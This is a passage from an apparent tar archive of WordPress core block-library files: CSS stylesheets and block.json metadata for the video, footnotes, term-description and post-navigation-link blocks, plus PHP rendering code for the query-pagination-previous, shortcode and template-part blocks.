.editor-video-poster-control .components-button{
  margin-right:8px;
}

.block-library-video-tracks-editor{
  z-index:159990;
}

.block-library-video-tracks-editor__track-list-track{
  padding-left:12px;
}

.block-library-video-tracks-editor__single-track-editor-kind-select{
  max-width:240px;
}

.block-library-video-tracks-editor__single-track-editor-edit-track-label{
  color:#757575;
  display:block;
  font-size:11px;
  font-weight:500;
  margin-top:4px;
  text-transform:uppercase;
}

.block-library-video-tracks-editor>.components-popover__content{
  padding:0;
  width:360px;
}

.block-library-video-tracks-editor__add-tracks-container .components-menu-group__label,.block-library-video-tracks-editor__track-list .components-menu-group__label{
  padding:0;
}

.block-library-video-tracks-editor__add-tracks-container,.block-library-video-tracks-editor__single-track-editor,.block-library-video-tracks-editor__track-list{
  padding:12px;
}video/editor.min.css000060400000003465151330427370010445 0ustar00.wp-block-video.wp-block-video.is-selected .components-placeholder{background-color:#fff;border:none;border-radius:2px;box-shadow:inset 0 0 0 1px #1e1e1e;color:#1e1e1e}.wp-block-video.wp-block-video.is-selected .components-placeholder>svg{opacity:0}.wp-block-video.wp-block-video.is-selected .components-placeholder .components-placeholder__illustration{display:none}.wp-block-video.wp-block-video.is-selected .components-placeholder:before{opacity:0}.wp-block-video.wp-block-video .components-button,.wp-block-video.wp-block-video .components-placeholder__instructions,.wp-block-video.wp-block-video .components-placeholder__label{transition:none}.wp-block[data-align=center]>.wp-block-video{text-align:center}.wp-block-video{position:relative}.wp-block-video.is-transient video{opacity:.3}.wp-block-video .components-spinner{left:50%;margin-left:-9px;margin-top:-9px;position:absolute;top:50%}.editor-video-poster-control .components-base-control__label{display:block}.editor-video-poster-control .components-button{margin-right:8px}.block-library-video-tracks-editor{z-index:159990}.block-library-video-tracks-editor__track-list-track{padding-left:12px}.block-library-video-tracks-editor__single-track-editor-kind-select{max-width:240px}.block-library-video-tracks-editor__single-track-editor-edit-track-label{color:#757575;display:block;font-size:11px;font-weight:500;margin-top:4px;text-transform:uppercase}.block-library-video-tracks-editor>.components-popover__content{padding:0;width:360px}.block-library-video-tracks-editor__add-tracks-container .components-menu-group__label,.block-library-video-tracks-editor__track-list .components-menu-group__label{padding:0}.block-library-video-tracks-editor__add-tracks-container,.block-library-video-tracks-editor__single-track-editor,.block-library-video-tracks-editor__track-list{padding:12px}video/style.min.css000060400000000427151330427370010312 0ustar00.wp-block-video{box-sizing:border-box}.wp-block-video video{vertical-align:middle;width:100%}@supports (position:sticky){.wp-block-video [poster]{object-fit:cover}}.wp-block-video.aligncenter{text-align:center}.wp-block-video :where(figcaption){margin-bottom:1em;margin-top:.5em}video/style-rtl.min.css000060400000000427151330427370011111 0ustar00.wp-block-video{box-sizing:border-box}.wp-block-video video{vertical-align:middle;width:100%}@supports (position:sticky){.wp-block-video [poster]{object-fit:cover}}.wp-block-video.aligncenter{text-align:center}.wp-block-video :where(figcaption){margin-bottom:1em;margin-top:.5em}video/theme-rtl.css000060400000000310151330427370010260 0ustar00.wp-block-video :where(figcaption){
  color:#555;
  font-size:13px;
  text-align:center;
}
.is-dark-theme .wp-block-video :where(figcaption){
  color:#ffffffa6;
}

.wp-block-video{
  margin:0 0 1em;
}video/block.json000060400000003653151330427370007647 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/video",
	"title": "Video",
	"category": "media",
	"description": "Embed a video from your media library or upload a new one.",
	"keywords": [ "movie" ],
	"textdomain": "default",
	"attributes": {
		"autoplay": {
			"type": "boolean",
			"source": "attribute",
			"selector": "video",
			"attribute": "autoplay"
		},
		"caption": {
			"type": "rich-text",
			"source": "rich-text",
			"selector": "figcaption",
			"__experimentalRole": "content"
		},
		"controls": {
			"type": "boolean",
			"source": "attribute",
			"selector": "video",
			"attribute": "controls",
			"default": true
		},
		"id": {
			"type": "number",
			"__experimentalRole": "content"
		},
		"loop": {
			"type": "boolean",
			"source": "attribute",
			"selector": "video",
			"attribute": "loop"
		},
		"muted": {
			"type": "boolean",
			"source": "attribute",
			"selector": "video",
			"attribute": "muted"
		},
		"poster": {
			"type": "string",
			"source": "attribute",
			"selector": "video",
			"attribute": "poster"
		},
		"preload": {
			"type": "string",
			"source": "attribute",
			"selector": "video",
			"attribute": "preload",
			"default": "metadata"
		},
		"src": {
			"type": "string",
			"source": "attribute",
			"selector": "video",
			"attribute": "src",
			"__experimentalRole": "content"
		},
		"playsInline": {
			"type": "boolean",
			"source": "attribute",
			"selector": "video",
			"attribute": "playsinline"
		},
		"tracks": {
			"__experimentalRole": "content",
			"type": "array",
			"items": {
				"type": "object"
			},
			"default": []
		}
	},
	"supports": {
		"anchor": true,
		"align": true,
		"spacing": {
			"margin": true,
			"padding": true,
			"__experimentalDefaultControls": {
				"margin": false,
				"padding": false
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"editorStyle": "wp-block-video-editor",
	"style": "wp-block-video"
}
video/style-rtl.css000060400000000502151330427370010321 0ustar00.wp-block-video{
  box-sizing:border-box;
}
.wp-block-video video{
  vertical-align:middle;
  width:100%;
}
@supports (position:sticky){
  .wp-block-video [poster]{
    object-fit:cover;
  }
}
.wp-block-video.aligncenter{
  text-align:center;
}
.wp-block-video :where(figcaption){
  margin-bottom:1em;
  margin-top:.5em;
}video/editor-rtl.css000060400000003726151330427370010462 0ustar00.wp-block-video.wp-block-video.is-selected .components-placeholder{
  background-color:#fff;
  border:none;
  border-radius:2px;
  box-shadow:inset 0 0 0 1px #1e1e1e;
  color:#1e1e1e;
}
.wp-block-video.wp-block-video.is-selected .components-placeholder>svg{
  opacity:0;
}
.wp-block-video.wp-block-video.is-selected .components-placeholder .components-placeholder__illustration{
  display:none;
}
.wp-block-video.wp-block-video.is-selected .components-placeholder:before{
  opacity:0;
}
.wp-block-video.wp-block-video .components-button,.wp-block-video.wp-block-video .components-placeholder__instructions,.wp-block-video.wp-block-video .components-placeholder__label{
  transition:none;
}

.wp-block[data-align=center]>.wp-block-video{
  text-align:center;
}

.wp-block-video{
  position:relative;
}
.wp-block-video.is-transient video{
  opacity:.3;
}
.wp-block-video .components-spinner{
  margin-right:-9px;
  margin-top:-9px;
  position:absolute;
  right:50%;
  top:50%;
}

.editor-video-poster-control .components-base-control__label{
  display:block;
}
.editor-video-poster-control .components-button{
  margin-left:8px;
}

.block-library-video-tracks-editor{
  z-index:159990;
}

.block-library-video-tracks-editor__track-list-track{
  padding-right:12px;
}

.block-library-video-tracks-editor__single-track-editor-kind-select{
  max-width:240px;
}

.block-library-video-tracks-editor__single-track-editor-edit-track-label{
  color:#757575;
  display:block;
  font-size:11px;
  font-weight:500;
  margin-top:4px;
  text-transform:uppercase;
}

.block-library-video-tracks-editor>.components-popover__content{
  padding:0;
  width:360px;
}

.block-library-video-tracks-editor__add-tracks-container .components-menu-group__label,.block-library-video-tracks-editor__track-list .components-menu-group__label{
  padding:0;
}

.block-library-video-tracks-editor__add-tracks-container,.block-library-video-tracks-editor__single-track-editor,.block-library-video-tracks-editor__track-list{
  padding:12px;
}video/style.css000060400000000502151330427370007522 0ustar00.wp-block-video{
  box-sizing:border-box;
}
.wp-block-video video{
  vertical-align:middle;
  width:100%;
}
@supports (position:sticky){
  .wp-block-video [poster]{
    object-fit:cover;
  }
}
.wp-block-video.aligncenter{
  text-align:center;
}
.wp-block-video :where(figcaption){
  margin-bottom:1em;
  margin-top:.5em;
}video/theme-rtl.min.css000060400000000260151330427370011046 0ustar00.wp-block-video :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video :where(figcaption){color:#ffffffa6}.wp-block-video{margin:0 0 1em}video/editor-rtl.min.css000060400000003467151330427370011246 0ustar00.wp-block-video.wp-block-video.is-selected .components-placeholder{background-color:#fff;border:none;border-radius:2px;box-shadow:inset 0 0 0 1px #1e1e1e;color:#1e1e1e}.wp-block-video.wp-block-video.is-selected .components-placeholder>svg{opacity:0}.wp-block-video.wp-block-video.is-selected .components-placeholder .components-placeholder__illustration{display:none}.wp-block-video.wp-block-video.is-selected .components-placeholder:before{opacity:0}.wp-block-video.wp-block-video .components-button,.wp-block-video.wp-block-video .components-placeholder__instructions,.wp-block-video.wp-block-video .components-placeholder__label{transition:none}.wp-block[data-align=center]>.wp-block-video{text-align:center}.wp-block-video{position:relative}.wp-block-video.is-transient video{opacity:.3}.wp-block-video .components-spinner{margin-right:-9px;margin-top:-9px;position:absolute;right:50%;top:50%}.editor-video-poster-control .components-base-control__label{display:block}.editor-video-poster-control .components-button{margin-left:8px}.block-library-video-tracks-editor{z-index:159990}.block-library-video-tracks-editor__track-list-track{padding-right:12px}.block-library-video-tracks-editor__single-track-editor-kind-select{max-width:240px}.block-library-video-tracks-editor__single-track-editor-edit-track-label{color:#757575;display:block;font-size:11px;font-weight:500;margin-top:4px;text-transform:uppercase}.block-library-video-tracks-editor>.components-popover__content{padding:0;width:360px}.block-library-video-tracks-editor__add-tracks-container .components-menu-group__label,.block-library-video-tracks-editor__track-list .components-menu-group__label{padding:0}.block-library-video-tracks-editor__add-tracks-container,.block-library-video-tracks-editor__single-track-editor,.block-library-video-tracks-editor__track-list{padding:12px}video/theme.min.css000060400000000260151330427370010247 0ustar00.wp-block-video :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video :where(figcaption){color:#ffffffa6}.wp-block-video{margin:0 0 1em}video/theme.css000060400000000310151330427370007461 0ustar00.wp-block-video :where(figcaption){
  color:#555;
  font-size:13px;
  text-align:center;
}
.is-dark-theme .wp-block-video :where(figcaption){
  color:#ffffffa6;
}

.wp-block-video{
  margin:0 0 1em;
}query-pagination-previous.php000060400000006145151330427370012432 0ustar00<?php
/**
 * Server-side rendering of the `core/query-pagination-previous` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/query-pagination-previous` block on the server.
 *
 * @since 5.8.0
 *
 * @param array    $attributes Block attributes.
 * @param string   $content    Block default content.
 * @param WP_Block $block      Block instance.
 *
 * @return string Returns the previous posts link for the query.
 */
function render_block_core_query_pagination_previous( $attributes, $content, $block ) {
	$page_key            = isset( $block->context['queryId'] ) ? 'query-' . $block->context['queryId'] . '-page' : 'query-page';
	$enhanced_pagination = isset( $block->context['enhancedPagination'] ) && $block->context['enhancedPagination'];
	$page                = empty( $_GET[ $page_key ] ) ? 1 : (int) $_GET[ $page_key ];

	$wrapper_attributes = get_block_wrapper_attributes();
	$show_label         = isset( $block->context['showLabel'] ) ? (bool) $block->context['showLabel'] : true;
	$default_label      = __( 'Previous Page' );
	$label_text         = isset( $attributes['label'] ) && ! empty( $attributes['label'] ) ? esc_html( $attributes['label'] ) : $default_label;
	$label              = $show_label ? $label_text : '';
	$pagination_arrow   = get_query_pagination_arrow( $block, false );
	if ( ! $label ) {
		$wrapper_attributes .= ' aria-label="' . $label_text . '"';
	}
	if ( $pagination_arrow ) {
		$label = $pagination_arrow . $label;
	}
	$content = '';
	// Check if the pagination is for Query that inherits the global context
	// and handle appropriately.
	if ( isset( $block->context['query']['inherit'] ) && $block->context['query']['inherit'] ) {
		$filter_link_attributes = static function () use ( $wrapper_attributes ) {
			return $wrapper_attributes;
		};

		add_filter( 'previous_posts_link_attributes', $filter_link_attributes );
		$content = get_previous_posts_link( $label );
		remove_filter( 'previous_posts_link_attributes', $filter_link_attributes );
	} elseif ( 1 !== $page ) {
		$content = sprintf(
			'<a href="%1$s" %2$s>%3$s</a>',
			esc_url( add_query_arg( $page_key, $page - 1 ) ),
			$wrapper_attributes,
			$label
		);
	}

	if ( $enhanced_pagination && isset( $content ) ) {
		$p = new WP_HTML_Tag_Processor( $content );
		if ( $p->next_tag(
			array(
				'tag_name'   => 'a',
				'class_name' => 'wp-block-query-pagination-previous',
			)
		) ) {
			$p->set_attribute( 'data-wp-key', 'query-pagination-previous' );
			$p->set_attribute( 'data-wp-on--click', 'core/query::actions.navigate' );
			$p->set_attribute( 'data-wp-on-async--mouseenter', 'core/query::actions.prefetch' );
			$p->set_attribute( 'data-wp-watch', 'core/query::callbacks.prefetch' );
			$content = $p->get_updated_html();
		}
	}

	return $content;
}

/**
 * Registers the `core/query-pagination-previous` block on the server.
 *
 * @since 5.8.0
 */
function register_block_core_query_pagination_previous() {
	register_block_type_from_metadata(
		__DIR__ . '/query-pagination-previous',
		array(
			'render_callback' => 'render_block_core_query_pagination_previous',
		)
	);
}
add_action( 'init', 'register_block_core_query_pagination_previous' );
shortcode.php000060400000001337151330427370007254 0ustar00<?php
/**
 * Server-side rendering of the `core/shortcode` block.
 *
 * @package WordPress
 */

/**
 * Performs wpautop() on the shortcode block content.
 *
 * @since 5.0.0
 *
 * @param array  $attributes The block attributes.
 * @param string $content    The block content.
 *
 * @return string Returns the block content.
 */
function render_block_core_shortcode( $attributes, $content ) {
	return wpautop( $content );
}

/**
 * Registers the `core/shortcode` block on server.
 *
 * @since 5.0.0
 */
function register_block_core_shortcode() {
	register_block_type_from_metadata(
		__DIR__ . '/shortcode',
		array(
			'render_callback' => 'render_block_core_shortcode',
		)
	);
}
add_action( 'init', 'register_block_core_shortcode' );
term-description/style-rtl.min.css000060400000000256151330427370013273 0ustar00:where(.wp-block-term-description){margin-bottom:var(--wp--style--block-gap);margin-top:var(--wp--style--block-gap)}.wp-block-term-description p{margin-bottom:0;margin-top:0}term-description/style.css000060400000000300151330427370011700 0ustar00:where(.wp-block-term-description){
  margin-bottom:var(--wp--style--block-gap);
  margin-top:var(--wp--style--block-gap);
}

.wp-block-term-description p{
  margin-bottom:0;
  margin-top:0;
}term-description/style.min.css000060400000000256151330427370012474 0ustar00:where(.wp-block-term-description){margin-bottom:var(--wp--style--block-gap);margin-top:var(--wp--style--block-gap)}.wp-block-term-description p{margin-bottom:0;margin-top:0}term-description/block.json000060400000001773151330427370012032 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/term-description",
	"title": "Term Description",
	"category": "theme",
	"description": "Display the description of categories, tags and custom taxonomies when viewing an archive.",
	"textdomain": "default",
	"attributes": {
		"textAlign": {
			"type": "string"
		}
	},
	"supports": {
		"align": [ "wide", "full" ],
		"html": false,
		"color": {
			"link": true,
			"__experimentalDefaultControls": {
				"background": true,
				"text": true
			}
		},
		"spacing": {
			"padding": true,
			"margin": true
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	}
}
term-description/style-rtl.css000060400000000300151330427370012477 0ustar00:where(.wp-block-term-description){
  margin-bottom:var(--wp--style--block-gap);
  margin-top:var(--wp--style--block-gap);
}

.wp-block-term-description p{
  margin-bottom:0;
  margin-top:0;
}footnotes/style-rtl.css000060400000000510151330427370011232 0ustar00.editor-styles-wrapper,.entry-content{
  counter-reset:footnotes;
}

a[data-fn].fn{
  counter-increment:footnotes;
  display:inline-flex;
  font-size:smaller;
  text-decoration:none;
  text-indent:-9999999px;
  vertical-align:super;
}

a[data-fn].fn:after{
  content:"[" counter(footnotes) "]";
  float:right;
  text-indent:0;
}footnotes/style-rtl.min.css000060400000000440151330427370012016 0ustar00.editor-styles-wrapper,.entry-content{counter-reset:footnotes}a[data-fn].fn{counter-increment:footnotes;display:inline-flex;font-size:smaller;text-decoration:none;text-indent:-9999999px;vertical-align:super}a[data-fn].fn:after{content:"[" counter(footnotes) "]";float:right;text-indent:0}footnotes/style.min.css000060400000000437151330427370011225 0ustar00.editor-styles-wrapper,.entry-content{counter-reset:footnotes}a[data-fn].fn{counter-increment:footnotes;display:inline-flex;font-size:smaller;text-decoration:none;text-indent:-9999999px;vertical-align:super}a[data-fn].fn:after{content:"[" counter(footnotes) "]";float:left;text-indent:0}footnotes/style.css000060400000000507151330427370010441 0ustar00.editor-styles-wrapper,.entry-content{
  counter-reset:footnotes;
}

a[data-fn].fn{
  counter-increment:footnotes;
  display:inline-flex;
  font-size:smaller;
  text-decoration:none;
  text-indent:-9999999px;
  vertical-align:super;
}

a[data-fn].fn:after{
  content:"[" counter(footnotes) "]";
  float:left;
  text-indent:0;
}footnotes/block.json000060400000002604151330427370010554 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/footnotes",
	"title": "Footnotes",
	"category": "text",
	"description": "Display footnotes added to the page.",
	"keywords": [ "references" ],
	"textdomain": "default",
	"usesContext": [ "postId", "postType" ],
	"supports": {
		"__experimentalBorder": {
			"radius": true,
			"color": true,
			"width": true,
			"style": true,
			"__experimentalDefaultControls": {
				"radius": false,
				"color": false,
				"width": false,
				"style": false
			}
		},
		"color": {
			"background": true,
			"link": true,
			"text": true,
			"__experimentalDefaultControls": {
				"link": true,
				"text": true
			}
		},
		"html": false,
		"multiple": false,
		"reusable": false,
		"inserter": false,
		"spacing": {
			"margin": true,
			"padding": true,
			"__experimentalDefaultControls": {
				"margin": false,
				"padding": false
			}
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalTextDecoration": true,
			"__experimentalFontStyle": true,
			"__experimentalFontWeight": true,
			"__experimentalLetterSpacing": true,
			"__experimentalTextTransform": true,
			"__experimentalWritingMode": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"style": "wp-block-footnotes"
}
comments-pagination-previous/block.json000060400000001777151330427370014374 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/comments-pagination-previous",
	"title": "Comments Previous Page",
	"category": "theme",
	"parent": [ "core/comments-pagination" ],
	"description": "Displays the previous comment's page link.",
	"textdomain": "default",
	"attributes": {
		"label": {
			"type": "string"
		}
	},
	"usesContext": [ "postId", "comments/paginationArrow" ],
	"supports": {
		"reusable": false,
		"html": false,
		"color": {
			"gradients": true,
			"text": false,
			"__experimentalDefaultControls": {
				"background": true
			}
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	}
}
template-part.php000060400000023564151330427370010047 0ustar00<?php
/**
 * Server-side rendering of the `core/template-part` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/template-part` block on the server.
 *
 * @since 5.9.0
 *
 * @global WP_Embed $wp_embed WordPress Embed object.
 *
 * @param array $attributes The block attributes.
 *
 * @return string The render.
 */
function render_block_core_template_part( $attributes ) {
	static $seen_ids = array();

	$template_part_id = null;
	$content          = null;
	$area             = WP_TEMPLATE_PART_AREA_UNCATEGORIZED;
	$theme            = isset( $attributes['theme'] ) ? $attributes['theme'] : get_stylesheet();

	if ( isset( $attributes['slug'] ) && get_stylesheet() === $theme ) {
		$template_part_id    = $theme . '//' . $attributes['slug'];
		$template_part_query = new WP_Query(
			array(
				'post_type'           => 'wp_template_part',
				'post_status'         => 'publish',
				'post_name__in'       => array( $attributes['slug'] ),
				'tax_query'           => array(
					array(
						'taxonomy' => 'wp_theme',
						'field'    => 'name',
						'terms'    => $theme,
					),
				),
				'posts_per_page'      => 1,
				'no_found_rows'       => true,
				'lazy_load_term_meta' => false, // Do not lazy load term meta, as template parts only have one term.
			)
		);
		$template_part_post  = $template_part_query->have_posts() ? $template_part_query->next_post() : null;
		if ( $template_part_post ) {
			// A published post might already exist if this template part was customized elsewhere
			// or if it's part of a customized template.
			$block_template = _build_block_template_result_from_post( $template_part_post );
			$content        = $block_template->content;
			if ( isset( $block_template->area ) ) {
				$area = $block_template->area;
			}
			/**
			 * Fires when a block template part is loaded from a template post stored in the database.
			 *
			 * @since 5.9.0
			 *
			 * @param string  $template_part_id   The requested template part namespaced to the theme.
			 * @param array   $attributes         The block attributes.
			 * @param WP_Post $template_part_post The template part post object.
			 * @param string  $content            The template part content.
			 */
			do_action( 'render_block_core_template_part_post', $template_part_id, $attributes, $template_part_post, $content );
		} else {
			$template_part_file_path = '';
			// Else, if the template part was provided by the active theme,
			// render the corresponding file content.
			if ( 0 === validate_file( $attributes['slug'] ) ) {
				$block_template = get_block_file_template( $template_part_id, 'wp_template_part' );

				$content = $block_template->content;
				if ( isset( $block_template->area ) ) {
					$area = $block_template->area;
				}

				// Needed for the `render_block_core_template_part_file` and `render_block_core_template_part_none` actions below.
				$block_template_file = _get_block_template_file( 'wp_template_part', $attributes['slug'] );
				if ( $block_template_file ) {
					$template_part_file_path = $block_template_file['path'];
				}
			}

			if ( '' !== $content && null !== $content ) {
				/**
				 * Fires when a block template part is loaded from a template part in the theme.
				 *
				 * @since 5.9.0
				 *
				 * @param string $template_part_id        The requested template part namespaced to the theme.
				 * @param array  $attributes              The block attributes.
				 * @param string $template_part_file_path Absolute path to the template path.
				 * @param string $content                 The template part content.
				 */
				do_action( 'render_block_core_template_part_file', $template_part_id, $attributes, $template_part_file_path, $content );
			} else {
				/**
				 * Fires when a requested block template part does not exist in the database nor in the theme.
				 *
				 * @since 5.9.0
				 *
				 * @param string $template_part_id        The requested template part namespaced to the theme.
				 * @param array  $attributes              The block attributes.
				 * @param string $template_part_file_path Absolute path to the not found template path.
				 */
				do_action( 'render_block_core_template_part_none', $template_part_id, $attributes, $template_part_file_path );
			}
		}
	}

	// WP_DEBUG_DISPLAY must only be honored when WP_DEBUG. This precedent
	// is set in `wp_debug_mode()`.
	$is_debug = WP_DEBUG && WP_DEBUG_DISPLAY;

	if ( is_null( $content ) ) {
		if ( $is_debug && isset( $attributes['slug'] ) ) {
			return sprintf(
				/* translators: %s: Template part slug. */
				__( 'Template part has been deleted or is unavailable: %s' ),
				$attributes['slug']
			);
		}

		return '';
	}

	if ( isset( $seen_ids[ $template_part_id ] ) ) {
		return $is_debug ?
			// translators: Visible only in the front end, this warning takes the place of a faulty block.
			__( '[block rendering halted]' ) :
			'';
	}

	// Look up area definition.
	$area_definition = null;
	$defined_areas   = get_allowed_block_template_part_areas();
	foreach ( $defined_areas as $defined_area ) {
		if ( $defined_area['area'] === $area ) {
			$area_definition = $defined_area;
			break;
		}
	}

	// If $area is not allowed, set it back to the uncategorized default.
	if ( ! $area_definition ) {
		$area = WP_TEMPLATE_PART_AREA_UNCATEGORIZED;
	}

	// Run through the actions that are typically taken on the_content.
	$content                       = shortcode_unautop( $content );
	$content                       = do_shortcode( $content );
	$seen_ids[ $template_part_id ] = true;
	$content                       = do_blocks( $content );
	unset( $seen_ids[ $template_part_id ] );
	$content = wptexturize( $content );
	$content = convert_smilies( $content );
	$content = wp_filter_content_tags( $content, "template_part_{$area}" );

	// Handle embeds for block template parts.
	global $wp_embed;
	$content = $wp_embed->autoembed( $content );

	if ( empty( $attributes['tagName'] ) || tag_escape( $attributes['tagName'] ) !== $attributes['tagName'] ) {
		$area_tag = 'div';
		if ( $area_definition && isset( $area_definition['area_tag'] ) ) {
			$area_tag = $area_definition['area_tag'];
		}
		$html_tag = $area_tag;
	} else {
		$html_tag = esc_attr( $attributes['tagName'] );
	}
	$wrapper_attributes = get_block_wrapper_attributes();

	return "<$html_tag $wrapper_attributes>" . str_replace( ']]>', ']]&gt;', $content ) . "</$html_tag>";
}

/**
 * Returns an array of area variation objects for the template part block.
 *
 * @since 6.1.0
 *
 * @param array $instance_variations The variations for instances.
 *
 * @return array Array containing the block variation objects.
 */
function build_template_part_block_area_variations( $instance_variations ) {
	$variations    = array();
	$defined_areas = get_allowed_block_template_part_areas();

	foreach ( $defined_areas as $area ) {
		if ( 'uncategorized' !== $area['area'] ) {
			$has_instance_for_area = false;
			foreach ( $instance_variations as $variation ) {
				if ( $variation['attributes']['area'] === $area['area'] ) {
					$has_instance_for_area = true;
					break;
				}
			}

			$scope = $has_instance_for_area ? array() : array( 'inserter' );

			$variations[] = array(
				'name'        => 'area_' . $area['area'],
				'title'       => $area['label'],
				'description' => $area['description'],
				'attributes'  => array(
					'area' => $area['area'],
				),
				'scope'       => $scope,
				'icon'        => $area['icon'],
			);
		}
	}
	return $variations;
}

/**
 * Returns an array of instance variation objects for the template part block
 *
 * @since 6.1.0
 *
 * @return array Array containing the block variation objects.
 */
function build_template_part_block_instance_variations() {
	// Block themes are unavailable during installation.
	if ( wp_installing() ) {
		return array();
	}

	if ( ! current_theme_supports( 'block-templates' ) && ! current_theme_supports( 'block-template-parts' ) ) {
		return array();
	}

	$variations     = array();
	$template_parts = get_block_templates(
		array(
			'post_type' => 'wp_template_part',
		),
		'wp_template_part'
	);

	$defined_areas = get_allowed_block_template_part_areas();
	$icon_by_area  = array_combine( array_column( $defined_areas, 'area' ), array_column( $defined_areas, 'icon' ) );

	foreach ( $template_parts as $template_part ) {
		$variations[] = array(
			'name'        => 'instance_' . sanitize_title( $template_part->slug ),
			'title'       => $template_part->title,
			// If there's no description for the template part don't show the
			// block description. This is a bit hacky, but prevent the fallback
			// by using a non-breaking space so that the value of description
			// isn't falsey.
			'description' => $template_part->description || '&nbsp;',
			'attributes'  => array(
				'slug'  => $template_part->slug,
				'theme' => $template_part->theme,
				'area'  => $template_part->area,
			),
			'scope'       => array( 'inserter' ),
			'icon'        => isset( $icon_by_area[ $template_part->area ] ) ? $icon_by_area[ $template_part->area ] : null,
			'example'     => array(
				'attributes' => array(
					'slug'  => $template_part->slug,
					'theme' => $template_part->theme,
					'area'  => $template_part->area,
				),
			),
		);
	}
	return $variations;
}

/**
 * Returns an array of all template part block variations.
 *
 * @since 5.9.0
 *
 * @return array Array containing the block variation objects.
 */
function build_template_part_block_variations() {
	$instance_variations = build_template_part_block_instance_variations();
	$area_variations     = build_template_part_block_area_variations( $instance_variations );
	return array_merge( $area_variations, $instance_variations );
}

/**
 * Registers the `core/template-part` block on the server.
 *
 * @since 5.9.0
 */
function register_block_core_template_part() {
	register_block_type_from_metadata(
		__DIR__ . '/template-part',
		array(
			'render_callback'    => 'render_block_core_template_part',
			'variation_callback' => 'build_template_part_block_variations',
		)
	);
}
add_action( 'init', 'register_block_core_template_part' );
post-navigation-link/style-rtl.css000060400000001265151330427370013277 0ustar00.wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-previous{
  display:inline-block;
  margin-left:1ch;
}
.wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-previous:not(.is-arrow-chevron){
  transform:scaleX(-1);;
}
.wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-next{
  display:inline-block;
  margin-right:1ch;
}
.wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-next:not(.is-arrow-chevron){
  transform:scaleX(-1);;
}
.wp-block-post-navigation-link.has-text-align-left[style*="writing-mode: vertical-lr"],.wp-block-post-navigation-link.has-text-align-right[style*="writing-mode: vertical-rl"]{
  rotate:180deg;
}post-navigation-link/block.json000060400000002446151330427370012615 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/post-navigation-link",
	"title": "Post Navigation Link",
	"category": "theme",
	"description": "Displays the next or previous post link that is adjacent to the current post.",
	"textdomain": "default",
	"attributes": {
		"textAlign": {
			"type": "string"
		},
		"type": {
			"type": "string",
			"default": "next"
		},
		"label": {
			"type": "string"
		},
		"showTitle": {
			"type": "boolean",
			"default": false
		},
		"linkLabel": {
			"type": "boolean",
			"default": false
		},
		"arrow": {
			"type": "string",
			"default": "none"
		},
		"taxonomy": {
			"type": "string",
			"default": ""
		}
	},
	"usesContext": [ "postType" ],
	"supports": {
		"reusable": false,
		"html": false,
		"color": {
			"link": true
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalWritingMode": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"style": "wp-block-post-navigation-link"
}
post-navigation-link/style.min.css000060400000001216151330427370013256 0ustar00.wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-previous{display:inline-block;margin-right:1ch}.wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-previous:not(.is-arrow-chevron){transform:scaleX(1)}.wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-next{display:inline-block;margin-left:1ch}.wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-next:not(.is-arrow-chevron){transform:scaleX(1)}.wp-block-post-navigation-link.has-text-align-left[style*="writing-mode: vertical-lr"],.wp-block-post-navigation-link.has-text-align-right[style*="writing-mode: vertical-rl"]{rotate:180deg}post-navigation-link/style-rtl.min.css000060400000001220151330427370014050 0ustar00.wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-previous{display:inline-block;margin-left:1ch}.wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-previous:not(.is-arrow-chevron){transform:scaleX(-1)}.wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-next{display:inline-block;margin-right:1ch}.wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-next:not(.is-arrow-chevron){transform:scaleX(-1)}.wp-block-post-navigation-link.has-text-align-left[style*="writing-mode: vertical-lr"],.wp-block-post-navigation-link.has-text-align-right[style*="writing-mode: vertical-rl"]{rotate:180deg}post-navigation-link/style.css000060400000001261151330427370012474 0ustar00.wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-previous{
  display:inline-block;
  margin-right:1ch;
}
